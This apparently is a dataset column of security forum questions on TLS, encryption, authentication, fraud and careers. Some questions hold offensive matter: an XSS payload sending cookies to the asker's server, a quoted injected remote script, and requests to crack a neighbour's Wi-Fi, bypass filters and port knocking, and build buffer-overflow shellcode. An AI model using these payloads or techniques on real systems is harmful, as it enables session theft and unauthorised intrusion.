instruction
stringlengths
24
29.9k
My College Router has Dell Sonicwall authentication. We will be automatically redirected to the login page. If the username and password is correct a new popup opens showing that user 'x' has logged in and you have 'y' minutes remaining. We are asked not to close this tab when using internet. If we close this tab, we w...
I have always looked at reflected XSS as an attack that would take place through a URL. So, for example, you would have a URL like below: http://someSite.com?message=welcome!<script>alert(1);</script> and the message would be written to the page. In order to execute the attack you would need to trick someone into cl...
This might be a stupid question, but what is the range of the MAC addresses? Are these somehow leaking to the Internet with packets that a user sends (so they know where to return)?
In PGP 6.5.8, there is a concept of "validity" for a key, and it shows in the user interface for each key on the keyring. What is this concept, and how to you set it so a key is considered valid?
Suppose I want to call a program that takes in a username and password to start. What are the risks with calling the program like ./prog --user 'User' --password 'Password' other than the obvious leak of a user looking over your shoulder?. Is there a safer way to pass in the password?
I'm kind of a newbie to security and need help fully understanding how I would infect myself inadvertently. Let's say I was to download a .zip file attached to an email and I unzipped the contents. It's my understanding that the only way my computer would be compromised would be IF I EXECUTED any of those files contain...
I'm performing an authorized vulnerability analysis on a custom web service and have discovered a CSRF vulnerability. Due to there not being form tokens coupled with the service not checking for the origin header I believed I could forge requests via AJAX POSTs from an "infected" proof of concept page. Due to the way t...
I sell merchandise online. Due to suspicious activity (in my very amateur opinion), I have reason to believe that, what seems like two separate orders, are actually a single scam being perpetrated by one individual. I can disclose full details if necessary as to why I believe this might be a scam. I've tried tracing th...
I've heard about the new SSLStrip and how it is able to bypass HSTS. Where can I find an article that talks about this? How does this work? Where can I download it? Moxie's website has not been updated with new versions since 2011.
I have read this question and answer but still uncertain how it actually works and how a user could then be hacked. I'm asking because my brother supposedly was hacked and his bank uses exactly this kind of security. So my question how could this be done without a huge effort/expense from the hacker? Only way i see is ...
I have been reading up on the POODLE vulnerability. From my understanding, and correct me if I am wrong, you need to allow connections to be made via SSLv3 on the server. The server I am currently running defaults to TLS 1.0 in the browsers I have tested but I am not certain if the connection will downgrade to SSL 3.0...
Is the availability of these miners a reason to favor bcrypt (or something else) over scrypt? I mean, the goal of a password hash function is to maximize the work needed for an attacker to break a hash through brute force, dictionary or whatever, while minimizing the work needed for legitimite use. If the attacker can ...
My title pretty much sums it up. If I have: A server with the SSLv3 protocol disabled BUT still have SSLv3 ciphers enabled. Would that mean that a protocol downgrade attack can still occur?
Is there any Best Practice as far as changing IPSec pre-shared keys for security purposes? Obviously, larger companies would have a issue changing these and then pushing the new key out to the user machines. Any thoughts?
There is a sign-in form on the website, which submits login/password via POST method. Problem is, that code, which accepts login/password and authenticate user also accepts it via GET method (also, if user was logged in previously - user logged out and logged in as new user). Question 1: Is that considered secure? Look...
Here's the code at the bottom of every page: <script type="text/javascript">if(self==top){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);document.write("<scr"+"ipt type=text/javascript src="+idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request"...
We're using lighttpd 1.5.0-2349 which unfortunately doesn't support the option to disable SSLv3. I think a potential workaround would be to only allow it to use some cipher which has already been disabled in most browsers, so that if SSLv3 is used, there is no cipher overlap between server and client. Is this a good id...
I deleted a 2GB directory and sub-directories/data files from a TrueCrypt container mounted as a Drive Letter. The directory and sub-directories/data files was larger than the recycle bin so it was deleted without the recycle bin. The recycle bin was also deleted. The container can still be mounted and I have not use...
I have a few pcaps of traffic for EAP-TTLS conversation, carried by RADIUS. I also have some being carried by EAPoL, but I think the answer to that case might be even less straightforward (though perhaps not necessarily so). In both cases I can view the EAP contents in Wireshark, and I can drill down as far as TLS nego...
As an addition to this question: What unique fingerprinting information can an iOS7 app collect? What remaining device fingerprinting privacy/security vulnerabilities still exist as of iOS 8? Can 3rd-party apps still access a list of other running apps? How effective is it to test custom URL schemes to determine what o...
I've been following POODLE and the SSL_MODE_SEND_FALLBACK_SCSV TLS extension. I never really paid much attention to it, but it appears SSL_MODE_SEND_FALLBACK_SCSV is needed for clients like browsers which attempt to use a particular SSL/TS protocol version, and then fallback to a lesser version on failure. SSL/TLS effe...
This is for an Android (via Cordova/Phonegap) game project. My goal is to be able to provide a "promo code" that will allow anyone to unlock the game for free, but I want to limit each code to only work for a day and I don't want to rely on a server side component to validate the codes. The solution I came up with wa...
I have a client with a website receiving AV warnings from Microsoft Security Essentials. A further investigation revealed that the site is blacklisted by Yandex.com, due to a report that the site contains malicious javascript. Specifically: Troj/JSRedir-HP (Gumblar) I have removed this code from his site as it was loc...
I looked at the questions here and here. This then piqued my interest as I've recently been involved with looking into FIPS compliance, and in my vm environment /dev/urandom compliance testing generates data like this: [admin@xxx~]$ cat /dev/urandom | rngtest -c 5000 rngtest 2 Copyright (c) 2004 by Henrique de Moraes...
BadUsb works by infecting a computer when plugged into the USB port. Is it also possible for an attacker who gains control of a system, such as remote access, to then infect any connected USB devices? Or does it only affect the ports it's plugged into?
Im just starting out in school to study Network and Info Security. I know this is the field I want to invest my time and study into. Well over 200k security jobs went unfulfilled last year. My question is this - I know that real work experience is the most important factor that companies look at when comparing appli...
I have a thought. 1. Take a file. 2. Read number of bytes. If its less than 2048, padd it till 2048 3. Read each byte. And create a single file which contains the particular byte. Give a random name to the new file. 4. Do this for all the bytes. 5. Keep the order of the files which need to be joined in a text file sec...
If a large companies website's robots.txt file has no Disallow section, does this mean I am free to write code to crawl their website? The website in question is basically a data warehouse for the type of information I need, information which is updated on a minute by minute basis (so I'm going to be polling), and thei...
Does Suricata IPS have the capability to detect and prevent ARP poisoning attacks? Snort uses a preprocessor that decodes ARP packets and detects ARP attacks, but I couldn't find any such capability mentioned for Suricata IPS.
How is it possible that mailing systems like Gmail, Yahoo, and Hotmail are able to check the content of an attached password-protected archived file like WINRAR, if the password cannot be guessed, brute-forced, and recovered? Or is it possible that the WINRAR injected a back-door password and selling it to these mailin...
If I'm using full disk encryption on my home computer, and it's online, are the hard drive contents encrypted when I'm logged in and using the machine (from the perspective of an online attacker - no physical access - would only see encrypted data)? Similarly, what about when the machine is locked?
I currently handle small JSONs of sensitive information which are guaranteed to be smaller than 100 bytes. You can encrypt up to ~500 bytes with a 4096 RSA key. Is it safe/secure to store these chunks of encrypted messages together? Let's say they get altogether stolen for cryptanalysis. Let's say you even have plainte...
What agency issued a digital signature for the Cryptowall 2.0 ransomware virus? Is it too early to tell? As far as I know this is how Microsoft planned to prevent malware, by adding a digital certificate to the BIOS, or to any of the programs that get loaded on a Windows machine. As far as I know, the malware is smart...
Now I already know that making sure your browser plugins are either non-existent or up-to-date is one way of being on the safe side against ransomeware like Cryptowall 2.0; but since clicking ads are the way this thing is distributed, would ad-block plus be an effective plugin against such threats? Zedo and Double Clic...
Some is trying to access this link (and similar ones) frequently in my site: http://example.com/upload/RS=%5EADAJVxZ5NB.GMTgFV3EMEJX3sN22Jw- Note that my server doesn't have an upload folder inside of it, but it allows users to upload videos. So it is redirecting the attacker to a 404 page. So what is the attacker try...
Assuming both use session authentication, token validation and forced https: Is there any difference in security between submitting data via a JS popup <> ajax endpoint, and a standard web page form?
My company is developing a web application, and I was asked to research how to do hardware-based token authentication to login into our web application. Let me repeat: basically there will be a web app, and there will be a usb of sort to be connected to the computer, may be user will need to enter user name & password ...
I am new to Node.js and Socket.IO. According to documentation the client side code is something like: <script src="/socket.io/socket.io.js"></script> <script> var socket = io('http://localhost:3000'); socket.on('news', function (data) { console.log(data); socket.emit('my other event', { my: 'data' }); });...
A proxy usually controls HTTP(S) traffic going outbound. IE it can be blocked, and so forth. How is this different to a firewall working on port 80/443? Also, if a firewall is to control outbound http(s) traffic, how can it block ads? Would that not be a reverse proxy?
Are there any security implications of converting a byte-array encryption key into a Base64 string before use? I am creating a generic encryption helper for a project, and for the sake of consistency and generality, I use byte arrays for all inputs and outputs (plain data, key, salt, etc) However, the encryption librar...
I have a set up like this: Payment Server (PS) <> Front End (FE) <> Client JS. I need to get some data from the Client JS to the PS, without the FE being able to modify it and have PS prove that correct. In this situation, the FE acts as store and forward (with some basic validation of the payload). This is my plan: W...
Are there any security concerns I should be aware of, if I want to give users the ability to embed iframes(for things like Youtube videos) in their generated content on my site. The user generated content is editable by them, so I can't control iframe options like sandbox(though I might be able to do a check on the con...
This sounds maybe like a stupid question, but I'm wondering myself if this is theoretically possible. Let's say I'm using Facebook login in my app. If the login is successful I get I get back an OAuth token from Facebook to make API requests. Now Facebook has also this token and could use this to log in to my app and f...
Context Google is making end-to-end encryption easier to use. SPAM How will they be able to perform SPAM detection when the email is transmitted and stored encryptedly? I suppose that if the SPAM email sent to everybody has the identical body, then the encrpyted text will be identical, so it can easily be identified as...
I am running my own server, on which I have different services (Nginx etc.). All these (internet) services are / should be secured with SSL (offcialy signed). The key files / certificates are located in the directory /etc/ssl. Nginx (because it has root permissions) can read these files / directory, but other services ...
Is there an implementation of a file-sharing network protocol where the server has no idea what data is being stored, but can serve the encrypted files to clients that will decrypt them on-the-fly (if the client knows the key)?
Today I read the first time about a draft of TCP Stealth which should serve as a protection against GCHQ and NSA vulnerability scanning(Source: https://en.wikipedia.org/wiki/TCP_Stealth): The proposal modifies the TCP three-way handshake by only accepting connections from clients that transmit a proof of knowledge of a...
A program is using a private key to read messages. To improve security, besides randomness, I'm trying to create the longest passphrase that makes sense. How long should it be? After which amount of (random ascii) characters does it stop making sense adding more to the passphrase?
I have a very elementary understanding about encryption so this question may have false assumptions, Lets take an encryption algorithm that is impractical to break through bruteforce with today's hardware, assuming that moore's law is and will be valid in the near future, can we predict to some extent when will the com...
I have been looking at the SSL Certificate Trust Model, and there is something that does not make sense. If I am correct, the trust model makes it that if there is a chain of certificates with a trusted root certificate at the top of the chain, all certificates in this chain will be trusted. This does not make sense be...
Is there any way to hack the password of my neighbour WPA-PSK and WEP connection of WI-FI without using a keylogger. I tried a lots of softwares and efforts but unsuccessful. Can any one suggest. I want to try to hack only for educational purpose.
We have an email id, info@<ourdomain>.com This email id is being hacked frequently and mails are sent from this email id, Following is the example of one such email. From: info@<ourdomain>.com [mailto:info@<ourdomain>.com] Sent: 20 October 2014 03:00 To: info@<ourdomain>.com Subject: Starten Sie Ihre Karriere mit unser...
Whats the difference between Oauth protocol and https protocol?
I've come across an unknown type of hash value which looks like this: AAAAAATOM2KIII+kbR/Dqw3TLTw4PHsGPZft2c+b93rImFIuAQ== The corresponding hex string is: 0000000004CE336288208FA46D1FC3AB0DD32D3C383C7B063D97EDD9CF9BF77AC898522E01 I've tried to identify this string in OnlineHashCrack but it seems I cannot get any hint....
I was wondering, how can I bypass the port knocking method. Is there any public vulnerability or method for attacking port knocking services? For example: I know an SSH port is behind a port knocking service, and I want to find a way to exploit the port knocking service. Any ideas? I thought it could be bypassed by...
I have a Cisco ASA 5510 (ASA Version 8.3(2)) that has been getting a syn flood attack on it (or more accurately through it - targeting a host behind it) a couple of times a day for the past few days. The Internet connection itself is decent and it does not appear to fully saturate the line, but instead what seems to b...
I just started dipping my feet into security and SSL. I looked at various videos to try and understand how the magic happens and I have the general idea now, but most of them deal with it taking the browser and server example. With regards to mobile, I didn't find much data. I assume the questions are dumb for veterans...
I was trying cookie stealing on a java and spring based web application. Normally, a cookie can be obtained through <script>alert(document.cookie)</script>, but in the above code, cookie is not alerted. Burpsuite and tamperdata tools are showing this cookie: jsessionid=XXXXXXX..XXX Is there any way to catch cookies cli...
I've been looking into the structure of the online criminal underground, which consists of exploit kits, droppers, and malware payloads. What is the function of the dropper in this pipeline? Why aren't payloads deployed directly by the exploit kit?
I have been the victim of PayPal fraud. I hadn't used PayPal in a year and then within 9 days there were three unauthorized transactions on my account for a total of 150 Canadian dollars and 290 American dollars. I have since been refunded by PayPal. However, through my PayPal account, my e-mail address and phone numbe...
Passphrases normally contain more data then passwords and can provide more entropy. It seems like it would still be hard to brute force a passphrase w/o using PBKDF2, assuming a user didn't select a famous quote, movie line, etc... I define a passphrase in this example as at least 22 characters. For example, if a user...
I'm considering using a hidden TrueCrypt container to keep a Tor browser bundle copy which could save bookmarks. In this case, would the TBB leave traces on the OS it started with? E.g. I use my flash-drive to start TrueCrypt on some random Windows machine that contains the extracted TrueCrypt. I use it to mount my hid...
I am using a main Site Engine class which is constructing most of my pages. I'm using this language function to change language website for all of my pages in the start of the Site Engine class: `$defaultLang = 'en'; //Checking, if the $_GET["language"] has any value //if the $_GET["language"] is not empty if (!empty(...
It is known that every reputable website stores their user passwords into their database after implementing some hashing algorithm on it, and even they don't know what the actual password of the user is; and when the user logs in to their website, a HASH is generated from user's input password and compared to the hash ...
I want to make a career change from administration to IT but I have absolutely no experience and no certifications in IT. I am interested in information security and networking. So what certifications do I need to begin with?
I am building a system for a product which requires authentication and authorization. Naturally I have chosen using OAuth 2.0 as it is a commonly used protocol and has proven to be useful. I am considering implementing tokens without storage - as described here: http://bshaffer.github.io/oauth2-server-php-docs/overview...
How could this anti-xss regexp be bypassed: /<(?:\w+)\W+?[\w]/ I am working on it but I can't find a way. Just to be sure that I have understood it correctly, this regexp search for a pattern with a '<', then one or more characters, then one or more non character and then a character. Right? EDIT: Here is the code: <?...
There are now tons of Certification Authorities (CAs) that are trusted by default in major OS's, many of which are unrecognizable without online lookup or reference. While there have been attempts by the NSA and others to "hack" or otherwise exploit root certicate authorities; is there anything preventing the NSA from...
Is their a way you can make two yubikeys generate the exact same password at the exact same time? (identical copy) I am wanting to purchase two of them so I am able to store a backup yubikey in a secure location just in case I loose the main yubikey. I am mainly interested in this for SSH keys and Keepass database's
The situation: I'm currently working on shellcode (I modified the assembly code from Project Shellcode) that runs "cmd.exe /c calc.exe". The shellcode itself works fine. However, when I use the shellcode during a buffer overflow exploit, the 0x20 (space character) byte in the string gets replaced with a null byte. I'm ...
I wanted to encrypt my external drive with password, which is compatible in both Linux and Windows. Truecrypt is an option. But the development of it is stopped few months back. I came across crpytsetup in Ubuntu, which is said to work well in Windows with FreeOTFE. I tried encrypting using cryptsetup in Ubuntu, when ...
It is recommended, to mitigate POODLE, if SSLv3 cannot be disabled entirely, to make use of TLS_FALLBACK_SCSV, a signaling cipher suite value that indicates that fallback has occurred. The draft standard for it says: If TLS_FALLBACK_SCSV appears in ClientHello.cipher_suites and the highest protocol version supported b...
I have a newline separated list of domains that I would like to perform an arbitrary nmap scan on (e.g. aggressive, syn) and I would like to output a boolean that indicates whether or not any ports are open. The primary function here is to deduce whether a server is up even if it is ping blocking. Is there a common pa...
How do you create a readable password using bash with one line? What if i'm looking for 128 bits of entropy? EDIT By readable I mean the 94 printable ascii characters (without space). It can use less than these characters as long as it has at least 128 bits of entropy.
Have a question towards the 998 bytes limitation on the esmtp header line length. We have noticed the asa is dropping emails coming from various external mail servers with the header line length greater than 998. Have googled a bit on this issue and found there are various suggestions to remove the rule on the asa or m...
It's a common belief hybrid cryptosystems are better than asymmetric only. Is that allways like that? What's the benefit of using symmetric and asymmetric encryption for small data blocks (< 100 bytes)?
I'm a bit confused on the differences between Signature Algorithm, Signature Hash Algorithm, and Thumbprint Algorithm that are present in SSL/TLS certificates. Can someone please elaborate?
Any website secured using TLS can be impersonated using a rogue certificate issued by a rogue CA. This is irrespective of which CA issued the website’s true certificate and of any property of that certificate. — Marc Stevens et al. 2009 Is this still true? I understand one purpose of Certificate Transparency is to ev...
Can you please advise me on this, All the web sites visited on remote computer, can that be traced? I have a office computer say COMP1 and Home Computer COMP2. If i access any websites on COMP2 (remote), can that be traced on COMP1(office). On my TeamViewer Under Computers&Contacts I have added COMP1 and COMP2. Accessi...
I have just learned Digital Signature and am trying to ensure that I have got my understanding of Digital Signature on the correct track. Assume Alice wants to send a message (M) to Bob where the message is confidential , non-repudiation , integrity. Alice has the public key ( Apub) Alice has the private key (Apri) B...
Scenario is this. I have logged into a web server as admin through the Login page in browser. it has displayed me with a home page of sorts that has an input box with a button next to it saying "ping" it essentially will ping any ip address that you input. (tested with local and external URL's) I know for a fact the se...
How can I know what all types of events generated by Linux. I can get this from the logs, but reading logs and noting ID's is very time consuming. All events might not be triggered. I need this information for SIEM auditing. So is there any source where I can get this information?
I have a random number like 0.323978544752212. I want to encrypt a string using this random number into to numerical string i.e. final string is like 020006122188063255154070154055012148007180040020199052197129206154016135. I want to build a CGI application and want to use this encryption design. How can I achieve thi...
I have a problem, getting call from known numbers and when he lifts it, no one is speaking from other side! Well, the awkward part is, the call is from known numbers only, but if I ask the person calling back to them, they strangely answered that they have not called me on the day! I am hoping someone used those number...
I have taken advantage of an XSS vulnerability to steal a cookie by sending it as a variable in the URL to my php page. I think that is one of the normal processes. This is the XSS payload: <script>location.href = 'http://myserverIP/test/signup.php?cookie='+document.cookie;</script> And this is my php: $cookie = $_GET...
I have a thing to do, that basically bases on a server that is honest but curious. Therefore I want the server to have the public key for encryption and it will encrypt files during the process of upload, and different users will be able to download their respective files and decrypt them using their private keys. Thin...
So I am using Google Authenticator as my two factor authentication. I'm not a security expert, but I was thinking late last night as I was about to fall asleep: How can I login to my favourite 2FA-enabled websites if I lose my Android? Can someone with knowledge of this kind of thing please advise what I might do to ...
Original Question: There is this older person (60+yrs) who is runs a business with internet presence yet when I do am internet search on him nothing pops up, not even photos!! How do I find out if he is a Government agent or somehow uses an alias? Edit 10/21/14 for clarity: In other words: Is/are there any centralized...
I use full disk encryption on Linux and wonder whether there is any security risk ob having automatic login on the Linux itself. In case somebody breaks the encryption of the drive, they can read all the data directly, they would not have to log in to my Linux user account on the machine. So is there any reason I shoul...
Is TLS_FALLBACK_SCSV going to be the fix for servers that wish to keep SSLv3 enabled? If not what actions are being taken, if any, that address the vulnerability besides disabling SSLv3?
I run a HTTPS web service. Clients authenticate using a TLS Client Certificate. How do I configure a standard Linux web server (preferably Apache) to validate client certificates against their CRLs? The Client Certificate is issued by a 3rd party CA. All certificates include the CRL distribution point, but do not su...
I have an application which uses SSL (JSSE Implementation). Currently from my client side, the "Client Hello" message suggests a list of cipher suites that consists of both 128 & 256 bits key length encryption algorithm ( e.g. Cipher Suites: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA (0xc00a), TLS_ECDHE_RSA_WITH_AES_128_CBC_...
Does Google catches and keeps users typing patterns for identifying purposes? for example when I'm logged in my Google account and Searching for things Google records my "Typing Pattern" like typing speed and ... and makes an unique signature for me and then Identify me when I'm using Google from an anonymous computer ...
One common technique I use is xor bruteforcing on binary data. In this case, I would like a heuristic approach to determine whether or not any possible candidate plaintexts are javascript. This rules out the file command in unix like systems because it is merely recognized as ASCII text. I am looking for suggestions o...
I am working in IT department of a bank, currently we use 3DES to compute MAC of packet, is that safe enough using 3DES? Should we use any other more modern algorithm?
On occasion, I hear the terms "key length" and "bit strength" used interchangeably. Are these the same things? Or are they different?
I need to store a big message encrypted on a server. What I am about to do is: Encrypt the message with a AES key; (Authentication) Hash the message with SHA512 and encrypt the hash with RSA priv key (signature); Encrypt AES key, IV and item above with destination RSA public key. Where HMAC can help? I have authentic...
I'm sure most of you are aware of a game called Minecraft. Well a lot of people like to host servers, however many are unable to port forward or pay for hosting so they download and use a piece of software called Hamachi. It seems to allow them to form a connection group that acts as if they are all on the same router ...
For one of my course's midterm lab portion, the professor provided us flash drives to put our project in. Everyone had their named labeled on one, so she gave me the last one left out, which had a name that I was not able to find in our school's e-mail list. My AV asks scans any USB drives that get inserted into my lap...
I check my security settings (from my Facebook acc.) from time to time, and sometimes I see there are IP addresses which logged into my account but don't belong to me. When I look in the web who is the owner of this IP address I get info I don't know how to interpret. Does this mean that all those different IP addresse...